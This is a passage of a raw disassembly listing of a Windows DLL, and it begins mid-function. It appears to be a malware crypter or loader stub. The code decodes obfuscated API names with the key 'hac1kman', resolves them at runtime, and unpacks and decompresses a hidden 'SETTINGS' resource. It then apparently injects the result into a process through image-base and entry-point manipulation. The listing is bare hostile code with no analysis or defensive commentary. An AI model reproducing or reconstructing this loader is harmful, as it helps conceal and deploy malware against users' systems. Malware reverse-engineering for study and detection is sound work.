mov eax, [ebp+var_18]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_11C]
push eax
call [ebp+var_40]
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+var_10]
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_18]
mov eax, [eax+34h]
push eax
mov eax, [ebp+var_11C]
push eax
call [ebp+var_34]
lea eax, [ebp+var_C]
push eax
push 4
mov eax, [ebp+var_18]
add eax, 34h
push eax
mov eax, [ebp+var_68]
add eax, 8
push eax
mov eax, [ebp+var_11C]
push eax
call [ebp+var_34]
mov eax, [ebp+var_18]
mov eax, [eax+34h]
mov edx, [ebp+var_18]
add eax, [edx+28h]
mov [ebp+var_5C], eax
lea eax, [ebp+var_10C]
push eax
mov eax, [ebp+var_118]
push eax
call [ebp+var_38]
mov eax, [ebp+var_118]
push eax
call [ebp+var_3C]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000220D
loc_100021F4: ; CODE XREF: sub_10001DFC+40F�j
mov eax, [ebp+var_1C]
push eax
call sub_1000188C
pop ecx
mov eax, [ebp+hModule]
push eax
call [ebp+var_28]
retn
; ---------------------------------------------------------------------------
loc_10002206: ; DATA XREF: sub_10001DFC+1EE�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_100021F4
; ---------------------------------------------------------------------------
loc_1000220D: ; DATA XREF: sub_10001DFC+3F3�o
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002232
loc_1000221A: ; CODE XREF: sub_10001DFC+434�j
lea eax, [ebp+var_18C]
mov edx, 0Bh
call sub_1000161C
retn
; ---------------------------------------------------------------------------
loc_1000222B: ; DATA XREF: sub_10001DFC+19�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_1000221A
; ---------------------------------------------------------------------------
loc_10002232: ; CODE XREF: sub_10001DFC+42E�j
; DATA XREF: sub_10001DFC+419�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_10001DFC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 8
aHac1kman db 'hac1kman',0 ; DATA XREF: sub_10001DFC+2A�o
; sub_10001DFC+53�o ...
align 10h
dd 0FFFFFFFFh, 0Ch
dword_10002258 dd 6F716463h, 3C32616Eh, 6D6F6526h, 0 dd 0FFFFFFFFh, 0Eh
dword_10002270 dd 5177644Fh, 4F626279h, 6471656Ch, 7E78h, 0FFFFFFFFh
; DATA XREF: sub_10001DFC+58�o
dd 0Bh
dword_10002288 dd 6466734Eh, 7C636447h, 7A7369h, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_10001DFC+84�o
dword_1000229C dd 6066734Bh, 7C51687Fh, 72666267h, 4C78h, 0FFFFFFFFh
; DATA XREF: sub_10001DFC+AE�o
dd 10h
dword_100022B4 dd 5577644Fh, 6F647F63h, 6F6C426Ch, 7A79687Fh, 0
; DATA XREF: sub_10001DFC+D8�o
dd 0FFFFFFFFh, 11h
dword_100022D0 dd 6562645Ah, 6D6E7F5Bh, 4C70726Dh, 7C6E606Eh, 71h, 0FFFFFFFFh
; DATA XREF: sub_10001DFC+102�o
dd 12h
a_sjunSakdprfhl db '_sjun]sakdprFhlazx',0 ; DATA XREF: sub_10001DFC+12C�o
align 10h
dd 0FFFFFFFFh, 10h
dword_10002308 dd 5577645Bh, 6F647F63h, 6F6C426Ch, 7A79687Fh, 0
; DATA XREF: sub_10001DFC+156�o
dd 0FFFFFFFFh, 0Ch
aZdptfhufzdbe db 'ZdptfhUfzdbe',0 ; DATA XREF: sub_10001DFC+180�o
align 4
dd 0FFFFFFFFh, 0Eh
dword_1000233C dd 7571685Eh, 4F6D6C7Eh, 626C6D64h, 754Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000234C proc near ; DATA XREF: CODE:100023A8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_1000236B
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10002372
loc_1000236A: ; CODE XREF: sub_1000234C+24�j
retn
; ---------------------------------------------------------------------------
loc_1000236B: ; DATA XREF: sub_1000234C+6�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_1000236A
; ---------------------------------------------------------------------------
loc_10002372: ; CODE XREF: sub_1000234C:loc_1000236A�j
; DATA XREF: sub_1000234C+19�o
pop ebp
retn
sub_1000234C endp
; ---------------------------------------------------------------------------
dword_10002374 dd 6 dd offset off_1000237C
off_1000237C dd offset loc_10001A34 ; DATA XREF: CODE:10002378�o
dd offset sub_10001A04
dd offset sub_100018EC
dd offset sub_100018A4
dd offset sub_10001A6C
dd offset sub_10001A3C
dd offset sub_10001AC4
dd offset sub_10001A94
dd offset sub_10001CA4
dd offset sub_10001C74
align 8
dd offset sub_1000234C
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_100023AC proc near ; DATA XREF: start+6�o
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebp
mov ebp, esp
mov ecx, 8
loc_100023B4: ; CODE XREF: sub_100023AC+D�j
push 0
push 0
dec ecx
jnz short loc_100023B4
push ebx
push esi
push edi
mov eax, offset dword_10002374
call sub_100019C0
xor eax, eax
push ebp
push offset loc_100025F7
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_14]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_10002624
call sub_10001CAC
mov eax, [ebp+var_14]
call sub_10001758
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov ebx, eax
lea ecx, [ebp+var_18]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_1000263C
call sub_10001CAC
mov eax, [ebp+var_18]
call sub_10001758
push eax ; lpProcName
push ebx ; hModule
call GetProcAddress ; GetProcAddress
mov esi, eax
lea ecx, [ebp+var_1C]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_10002654
call sub_10001CAC
mov eax, [ebp+var_1C]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_10004134, eax
lea ecx, [ebp+var_20]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_10002668
call sub_10001CAC
mov eax, [ebp+var_20]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_10004138, eax
lea ecx, [ebp+var_24]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_10002680
call sub_10001CAC
mov eax, [ebp+var_24]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_10004140, eax
lea ecx, [ebp+var_28]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_10002698
call sub_10001CAC
mov eax, [ebp+var_28]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_10004144, eax
lea ecx, [ebp+var_2C]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_100026B0
call sub_10001CAC
mov eax, [ebp+var_2C]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_10004148, eax
lea ecx, [ebp+var_30]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, offset dword_100026C8
call sub_10001CAC
mov eax, [ebp+var_30]
call sub_10001758
push eax
push ebx
call esi
mov ds:dword_1000413C, eax
push 0Ah
push offset aSettings ; "SETTINGS"
mov eax, ds:dword_10004114
push eax
call ds:dword_10004138
mov esi, eax
push esi
mov eax, ds:dword_10004114
push eax
call ds:dword_10004140
mov ds:dword_1000412C, eax
push esi
mov eax, ds:dword_10004114
push eax
call ds:dword_10004144
mov esi, eax
push esi
call ds:dword_10004148
mov edi, eax
test edi, edi
jz short loc_10002566
mov edx, ds:dword_1000412C
dec edx
mov eax, offset dword_10004130
call sub_100017AC
mov eax, offset dword_10004130
call sub_100017A4
mov ecx, ds:dword_1000412C
mov edx, edi
call sub_10001A84
push esi
call ds:dword_1000413C
push ebx
call ds:dword_10004134
loc_10002566: ; CODE XREF: sub_100023AC+182�j
lea ecx, [ebp+var_34]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, ds:dword_10004130
call sub_10001CAC
mov edx, [ebp+var_34]
mov eax, offset dword_10004130
call sub_1000164C
mov eax, ds:dword_10004130
push eax
lea eax, [ebp+var_3C]
push eax
call sub_10001AE0
mov eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_38]
push eax
call sub_10001BA0
mov edx, [ebp+var_38]
mov eax, offset dword_10004130
call sub_1000164C
lea ecx, [ebp+var_40]
mov edx, offset aHac1kman_0 ; "hac1kman"
mov eax, ds:dword_10004130
call sub_10001CAC
mov edx, [ebp+var_40]
mov eax, offset dword_10004130
call sub_1000164C
mov eax, offset dword_10004130
call sub_100017A4
call sub_10001DFC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100025FE
loc_100025E9: ; CODE XREF: sub_100023AC+250�j
lea eax, [ebp+var_40]
mov edx, 0Ch
call sub_1000161C
retn
; ---------------------------------------------------------------------------
loc_100025F7: ; DATA XREF: sub_100023AC+1F�o
jmp loc_100013C8
; ---------------------------------------------------------------------------
jmp short loc_100025E9
; ---------------------------------------------------------------------------
loc_100025FE: ; CODE XREF: sub_100023AC+24A�j
; DATA XREF: sub_100023AC+238�o
pop edi
pop esi
pop ebx
call sub_10001510
sub_100023AC endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 8
aHac1kman_0 db 'hac1kman',0 ; DATA XREF: sub_100023AC+2D�o
; sub_100023AC+4F�o ...
align 4
dd 0FFFFFFFFh, 0Ch
dword_10002624 dd 6F716463h, 3C32616Eh, 6D6F6526h, 0 dd 0FFFFFFFFh, 0Eh
dword_1000263C dd 5177644Fh, 4F626279h, 6471656Ch, 7E78h, 0FFFFFFFFh
; DATA XREF: sub_100023AC+54�o
dd 0Bh
dword_10002654 dd 6466734Eh, 7C636447h, 7A7369h, 0FFFFFFFFh, 0Dh
; DATA XREF: sub_100023AC+77�o
dword_10002668 dd 656D684Eh, 61726859h, 6460737Dh, 4Ah, 0FFFFFFFFh, 0Eh
; DATA XREF: sub_100023AC+9A�o
dword_10002680 dd 6479685Bh, 6B536B64h, 73766E7Bh, 6868h, 0FFFFFFFFh
; DATA XREF: sub_100023AC+BD�o
dd 0Ch
dword_10002698 dd 65626E44h, 61726859h, 6460737Dh, 0 dd 0FFFFFFFFh, 0Ch
dword_100026B0 dd 6A606E44h, 61726859h, 6460737Dh, 0 dd 0FFFFFFFFh, 0Ch
dword_100026C8 dd 6466734Eh, 61726859h, 6460737Dh, 0aSettings db 'SETTINGS',0 ; DATA XREF: sub_100023AC+143�o
align 4
db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_3. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
push ebp
mov ebp, esp
sub esp, 8
push offset sub_100023AC
push offset nullsub_2
mov eax, offset nullsub_3
jmp eax
start endp
; ---------------------------------------------------------------------------
align 200h
CODE ends
; Section 2. (virtual address 00003000)
; Virtual size : 00000070 ( 112.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00001C00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 10003000h
dword_10003000 dd 0 ; sub_10001510+9�o ...
dword_10003004 dd 0 ; sub_10001510:loc_1000153F�r ...
byte_10003008 db 0 ; DATA XREF: sub_100013A0�r
db 8Dh, 40h, 0
dword_1000300C dd 0 ; sub_1000185C+8�w
dword_10003010 dd 0 off_10003014 dd offset sub_1000186C ; DATA XREF: sub_10001510+66�r
off_10003018 dd offset sub_10001434 ; DATA XREF: sub_10001434+F�r
; sub_10001434+35�r ...
off_1000301C dd offset sub_10001400 ; DATA XREF: sub_10001510:loc_1000155E�r
off_10003020 dd offset nullsub_1 ; DATA XREF: sub_10001510:loc_10001591�r
off_10003024 dd offset nullsub_1 ; DATA XREF: sub_100018A4:loc_100018CC�r
; DWORD dwFlags
dwFlags dd 0 ; DATA XREF: sub_10001080+1�r
; sub_10001094+4�r ...
off_1000302C dd offset sub_10001080 ; DATA XREF: sub_100010D0+4�r
; sub_10001100+3F�r
off_10003030 dd offset sub_10001094 ; DATA XREF: sub_100010E8+4�r
; sub_10001100+26�r ...
off_10003034 dd offset sub_100010B8 ; DATA XREF: sub_10001100+D�r
byte_10003038 db 0 ; DATA XREF: sub_1000115C+36�r
aRsu db 'ΛΜΘΙΧΟΘΝΞΫΨΚΩΪάέήίΰαγ',0
aFxn@ db 'δε@',0
off_10003054 dd offset nullsub_1 ; DATA XREF: sub_10001510+38�r
dword_10003058 dd 0 ; sub_100019C0+33�o
dword_1000305C dd 0 dword_10003060 dd 0 dword_10003064 dd 0 align 200h
DATA ends
; Section 3. (virtual address 00004000)
; Virtual size : 0000014D ( 333.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00001E00
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 10004000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
dword_10004000 dd ? dword_10004004 dd ? ; sub_1000115C+16�r
dword_10004008 dd ? ; sub_100014A4�w
dword_1000400C dd ? dword_10004010 dd ? ; sub_10001510+A9�r
dword_10004014 dd ? dword_10004018 dd ? byte_1000401C db ? ; DATA XREF: sub_100014A4+2E�w
align 10h
dword_10004020 dd ? dword_10004024 dd ? ; sub_100018EC�w
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_10001080+7�r
; sub_10001094+D�r ...
dword_1000402C dd 2 dup(?) ; sub_100014E0+D�o ...
dword_10004034 dd ? ; sub_100014A4+14�w
dword_10004038 dd ? ; sub_100014A4+1B�w
dword_1000403C dd ? dd 6 dup(?)
dword_10004058 dd ? ; sub_100018A4+22�r
dword_1000405C dd ? ; sub_10001834+19�w
dd 2Ah dup(?)
byte_10004108 db ? ; DATA XREF: sub_10001974�r
align 4
; DWORD TlsIndex
TlsIndex dd ? ; DATA XREF: sub_10001930+C�r
; sub_10001930+37�r ...
dd ?
dword_10004114 dd ? ; sub_100019C0+16�r ...
dword_10004118 dd ? ; CODE:loc_10001A34�w
dword_1000411C dd ? dword_10004120 dd ? ; sub_10001A6C�w
dword_10004124 dd ? ; sub_10001AC4�w
dword_10004128 dd ? ; sub_10001CA4�w
dword_1000412C dd ? ; sub_100023AC+184�r ...
dword_10004130 dd ? ; sub_100023AC+195�o ...
dword_10004134 dd ? ; sub_100023AC+1B4�r
dword_10004138 dd ? ; sub_100023AC+14E�r
dword_1000413C dd ? ; sub_100023AC+1AD�r
dword_10004140 dd ? ; sub_100023AC+15D�r
dword_10004144 dd ? ; sub_100023AC+16F�r
dword_10004148 dd ? ; sub_100023AC+178�r
align 100h
BSS ends
;
; Imports from kernel32.dll
;
; Section 4. (virtual address 00005000)
; Virtual size : 00000224 ( 548.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00001E00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetCurrentThreadId()
extrn __imp_GetCurrentThreadId:dword ; DATA XREF: GetCurrentThreadId�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
extrn RtlUnwind:dword ; DATA XREF: CODE:loc_10001060�r
; void __stdcall RaiseException(DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; DATA XREF: CODE:loc_10001058�r
; LPSTR __stdcall GetCommandLineA()
extrn __imp_GetCommandLineA:dword ; DATA XREF: GetCommandLineA�r
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex, LPVOID lpTlsValue)
extrn __imp_TlsSetValue:dword ; DATA XREF: TlsSetValue�r
; LPVOID __stdcall TlsGetValue(DWORD dwTlsIndex)
extrn __imp_TlsGetValue:dword ; DATA XREF: TlsGetValue�r
; HLOCAL __stdcall LocalAlloc(UINT uFlags, SIZE_T uBytes)
extrn __imp_LocalAlloc:dword ; DATA XREF: LocalAlloc�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword ; DATA XREF: GetModuleHandleA�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule, LPCH lpFilename, DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn __imp_FreeLibrary:dword ; DATA XREF: FreeLibrary�r
; BOOL __stdcall HeapFree(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem)
extrn __imp_HeapFree:dword ; DATA XREF: HeapFree�r
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes)
extrn __imp_HeapReAlloc:dword ; DATA XREF: HeapReAlloc�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes)
extrn __imp_HeapAlloc:dword ; DATA XREF: HeapAlloc�r
; HANDLE __stdcall GetProcessHeap()
extrn __imp_GetProcessHeap:dword ; DATA XREF: GetProcessHeap�r
;
; Imports from user32.dll
;
; LPSTR __stdcall CharNextA(LPCSTR lpsz)
extrn __imp_CharNextA:dword ; DATA XREF: CharNextA�r
;
; Imports from kernel32.dll
;
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn __imp_LoadLibraryA:dword ; DATA XREF: LoadLibraryA�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword ; DATA XREF: GetProcAddress�r
;
; Imports from ntdll.dll
;
extrn __imp_RtlDecompressBuffer:dword ; DATA XREF: RtlDecompressBuffer�r
; Section 5. (virtual address 00006000)
; Virtual size : 00000004 ( 4.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00002200
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 10006000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd ? ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 7Fh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 00007000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00002200
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 10007000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 200h
_rdata ends
end start